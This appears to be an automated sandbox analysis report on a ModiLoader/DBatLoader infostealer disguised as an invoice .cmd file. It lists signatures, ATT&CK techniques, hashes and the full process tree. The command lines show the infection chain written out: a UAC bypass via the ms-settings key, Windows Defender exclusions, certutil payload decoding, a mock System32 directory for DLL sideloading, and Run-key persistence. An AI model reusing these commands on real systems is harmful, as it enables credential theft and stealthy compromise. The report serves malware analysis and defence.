modiloader | eff779d4af4ddcc1833f1a8d877564dd7142431a48c0ac3364775a8a73802ee4

Analysis

max time kernel
141s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
07-06-2024 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

INV200495000-PAY ORDER0940584.cmd
Size

3.0MB
MD5

ba6011bbbcee0c141db0c45b8219a275
SHA1

e8fe383f4b6614b70fe9902618660aad3199bb62
SHA256

a7d331358f0530d1b5780f18ded9587256f16a675b1f440ebb73c92979d9719b
SHA512

3b1145ff9512fc0d7e3dcbae431cd3424e12721c17a4be043ca2b4ddd7ab4db5f9670ea07e75eedfad8d928b9fe08ca2412d062375b1df25e9ed31aa25fdfadf
SSDEEP

49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4Kh:7

Score

10^/10

modiloader execution persistence spyware stealer trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3188-119-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/3188-122-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

940 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

per.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation per.exe

pid	process
940	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 29 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.execmd.pifalpha.exealpha.exegeklllgC.pif

pid	process
2384	alpha.exe
4724	alpha.exe
2100	alpha.exe
3640	alpha.exe
1852	kn.exe
4684	alpha.exe
2460	alpha.exe
3984	alpha.exe
3928	alpha.exe
988	xkn.exe
4972	alpha.exe
1244	ger.exe
2176	alpha.exe
220	kn.exe
2992	per.exe
3508	alpha.exe
4960	Ping_c.pif
1280	alpha.exe
3124	alpha.exe
4796	alpha.exe
3812	alpha.exe
1388	alpha.exe
3628	alpha.exe
3928	alpha.exe
940	alpha.exe
748	cmd.pif
4968	alpha.exe
2876	alpha.exe
3188	geklllgC.pif

Loads dropped DLL 1 IoCs

Processes:

cmd.pif

pid process

748 cmd.pif
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
748	cmd.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Ping_c.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cglllkeg = "C:\\Users\\Public\\Cglllkeg.url"	Ping_c.pif

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 api.ipify.org
44 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

Ping_c.pif

description pid process target process

PID 4960 set thread context of 3188 4960 Ping_c.pif geklllgC.pif
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4868 taskkill.exe

flow	ioc
43	api.ipify.org
44	api.ipify.org

description	pid	process	target process
PID 4960 set thread context of 3188	4960	Ping_c.pif	geklllgC.pif

pid	process
4868	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	38	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	40	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

xkn.exepowershell.exegeklllgC.pif

pid process

988 xkn.exe
988 xkn.exe
988 xkn.exe
940 powershell.exe
940 powershell.exe
940 powershell.exe
3188 geklllgC.pif
3188 geklllgC.pif
3188 geklllgC.pif

pid	process
988	xkn.exe
988	xkn.exe
988	xkn.exe
940	powershell.exe
940	powershell.exe
940	powershell.exe
3188	geklllgC.pif
3188	geklllgC.pif
3188	geklllgC.pif

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

xkn.exetaskkill.exepowershell.exegeklllgC.pif

description	pid	process
Token: SeDebugPrivilege	988	xkn.exe
Token: SeDebugPrivilege	4868	taskkill.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	3188	geklllgC.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pif

description	pid	process	target process
PID 4632 wrote to memory of 1296	4632	cmd.exe	extrac32.exe
PID 4632 wrote to memory of 1296	4632	cmd.exe	extrac32.exe
PID 4632 wrote to memory of 2384	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 2384	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 4724	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 4724	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 2100	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 2100	4632	cmd.exe	alpha.exe
PID 2100 wrote to memory of 3204	2100	alpha.exe	extrac32.exe
PID 2100 wrote to memory of 3204	2100	alpha.exe	extrac32.exe
PID 4632 wrote to memory of 3640	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3640	4632	cmd.exe	alpha.exe
PID 3640 wrote to memory of 1852	3640	alpha.exe	kn.exe
PID 3640 wrote to memory of 1852	3640	alpha.exe	kn.exe
PID 4632 wrote to memory of 4684	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 4684	4632	cmd.exe	alpha.exe
PID 4684 wrote to memory of 964	4684	alpha.exe	extrac32.exe
PID 4684 wrote to memory of 964	4684	alpha.exe	extrac32.exe
PID 4632 wrote to memory of 2460	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 2460	4632	cmd.exe	alpha.exe
PID 2460 wrote to memory of 4700	2460	alpha.exe	extrac32.exe
PID 2460 wrote to memory of 4700	2460	alpha.exe	extrac32.exe
PID 4632 wrote to memory of 3984	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3984	4632	cmd.exe	alpha.exe
PID 3984 wrote to memory of 5052	3984	alpha.exe	extrac32.exe
PID 3984 wrote to memory of 5052	3984	alpha.exe	extrac32.exe
PID 4632 wrote to memory of 3928	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3928	4632	cmd.exe	alpha.exe
PID 3928 wrote to memory of 988	3928	alpha.exe	xkn.exe
PID 3928 wrote to memory of 988	3928	alpha.exe	xkn.exe
PID 988 wrote to memory of 4972	988	xkn.exe	alpha.exe
PID 988 wrote to memory of 4972	988	xkn.exe	alpha.exe
PID 4972 wrote to memory of 1244	4972	alpha.exe	ger.exe
PID 4972 wrote to memory of 1244	4972	alpha.exe	ger.exe
PID 4632 wrote to memory of 2176	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 2176	4632	cmd.exe	alpha.exe
PID 2176 wrote to memory of 220	2176	alpha.exe	kn.exe
PID 2176 wrote to memory of 220	2176	alpha.exe	kn.exe
PID 4632 wrote to memory of 2992	4632	cmd.exe	per.exe
PID 4632 wrote to memory of 2992	4632	cmd.exe	per.exe
PID 4632 wrote to memory of 3508	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3508	4632	cmd.exe	alpha.exe
PID 3508 wrote to memory of 4868	3508	alpha.exe	taskkill.exe
PID 3508 wrote to memory of 4868	3508	alpha.exe	taskkill.exe
PID 4632 wrote to memory of 4960	4632	cmd.exe	Ping_c.pif
PID 4632 wrote to memory of 4960	4632	cmd.exe	Ping_c.pif
PID 4632 wrote to memory of 4960	4632	cmd.exe	Ping_c.pif
PID 4632 wrote to memory of 1280	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 1280	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3124	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3124	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 4796	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 4796	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3812	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3812	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 1388	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 1388	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3628	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3628	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3928	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 3928	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 940	4632	cmd.exe	alpha.exe
PID 4632 wrote to memory of 940	4632	cmd.exe	alpha.exe
PID 4960 wrote to memory of 1296	4960	Ping_c.pif	cmd.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4632

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:1296

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:2384

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:4724

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2100

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:3204

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3640

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:1852

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:964

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:4700

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:5052

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3928

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4972

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:1244

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2176

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:220

C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2992

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\geklllgC.cmd""
3⤵
PID:1296

C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
4⤵
PID:2124

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
4⤵
- Executes dropped EXE
PID:2876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\Cglllkeg.bat""
3⤵
PID:4604

C:\Windows \System32\cmd.pif
"C:\Windows \System32\cmd.pif"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:748

C:\Windows\SYSTEM32\cmd.exe
cmd /c start /min powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
5⤵
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\cmd.pif"
4⤵
- Executes dropped EXE
PID:4968

C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Cglllkeg.PIF
3⤵
PID:1484

C:\Users\Public\Libraries\geklllgC.pif
C:\Users\Public\Libraries\geklllgC.pif
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:1280

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:3124

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:4796

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:3812

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1388

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:3628

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:3928

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:940

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:1488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3244,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:8
1⤵
PID:2884

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdiu34xr.wx0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Cglllkeg.bat
Filesize
23KB

MD5
997f3d1af6cf88547c7fe0cdf516ac0c

SHA1
d9bb666d58d8f33d82d6787f89bb4f21057c8965

SHA256
72c98a4c731ca55cceac4da6af62b6d9923282b5d8d07c6b920594bb85be2499

SHA512
e64d178552b5baf83449ae1631c62becd66729af8faedf612128ed3a2020b0e72ca1b424823f8e105ff79c364b488b06cca55023efac2965a1d0832dccfc16b9

Download Submit
C:\Users\Public\Libraries\Ping_c.pif
Filesize
1.1MB

MD5
cf0406a9f208a43a3a3eccf1769f55d5

SHA1
7a8d7bde7f7ffacbda4847f354d62e311312f071

SHA256
8bd6792495e882b3f5604fc9cf7fdc1357d38c5297593951bb26aa9309765df8

SHA512
ae35345f9a0d00de0f147056ad8f8c700eca6860ac869c28f6b71ef70f71bee96f8efeb5e2d7d8a75eee2aafeac34124ff5acc947c608478ee478332d9130b00

Download Submit
C:\Users\Public\Libraries\geklllgC.cmd
Filesize
13KB

MD5
ecac4200f2c6ab06102f8fe7b14a96af

SHA1
82e148655bfe410f80cafb070713259e94ec00cb

SHA256
067cd486f7b1a9b7ca52a6d2ab25fdd443f839485e4787a768f9c6654e003271

SHA512
d6c271a9bd0a2ab68ae3270bfca920049a86e8ad4aa66ce9c376a88f02de041a8bf7b24b757aac2f67042c38ff01f4b6f615cd1d1b76fe25974d7ffeb03ba348

Download Submit
C:\Users\Public\Libraries\geklllgC.pif
Filesize
66KB

MD5
c116d3604ceafe7057d77ff27552c215

SHA1
452b14432fb5758b46f2897aeccd89f7c82a727d

SHA256
7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

SHA512
9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

Download Submit
C:\Users\Public\Ping_c.mp4
Filesize
2.2MB

MD5
d7e89c5831e8bcb061122aa646bf5815

SHA1
d98375cc44cdb2662fafc4db36674833347a7ef7

SHA256
f6ed12b8c9298e89a282c473e2022c477116da4aee339e27569eb15368bf2076

SHA512
b497f8971be6958f0868d9c9ea68ade02e1ff18506360af5eda2ba87ac32a510fdb7dfd41701b1d894ec5901232fc3abe74ab2ff5fb0ba821936dde1b6914054

Download Submit
C:\Users\Public\alpha.exe
Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\alpha.exe
Filesize
231KB

MD5
d0fce3afa6aa1d58ce9fa336cc2b675b

SHA1
4048488de6ba4bfef9edf103755519f1f762668f

SHA256
4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22

SHA512
80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

Download Submit
C:\Users\Public\ger.exe
Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe
Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\cmd.pif
Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
C:\Windows \System32\netutils.dll
Filesize
109KB

MD5
3ef9e89c8bf16295c84b8c82bf5e1b50

SHA1
45fb8e0cd06da23564712614481265679369fee3

SHA256
e0d3d0cf79d7969da536946de8a7395cab39ddfaca7ba7353aa6544d04209b2e

SHA512
0d27d4fe85117003830b69575ea02b7ee67601db7d8b2e422f5f9b72735b9b3d15ab8b81b7a9f4f2b14caf1365d0137d9d437932c4640f97c883d3c7bf24a1c1

Download Submit
C:\Windows \System32\per.exe
Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/748-89-0x00000000613C0000-0x00000000613E2000-memory.dmp

Filesize
136KB

Download
memory/988-36-0x000001F368300000-0x000001F368322000-memory.dmp

Filesize
136KB

Download
memory/3188-182-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-136-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-122-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3188-123-0x0000000040300000-0x000000004035C000-memory.dmp

Filesize
368KB

Download
memory/3188-125-0x0000000040480000-0x0000000040A24000-memory.dmp

Filesize
5.6MB

Download
memory/3188-126-0x00000000403E0000-0x000000004043A000-memory.dmp

Filesize
360KB

Download
memory/3188-130-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-128-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-127-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-146-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-184-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-1183-0x0000000041EE0000-0x0000000041EEA000-memory.dmp

Filesize
40KB

Download
memory/3188-180-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-178-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-176-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
336KB

Download
memory/3188-174-0x00000000403E0000-0x0000000040434000-memory.dmp

Filesize
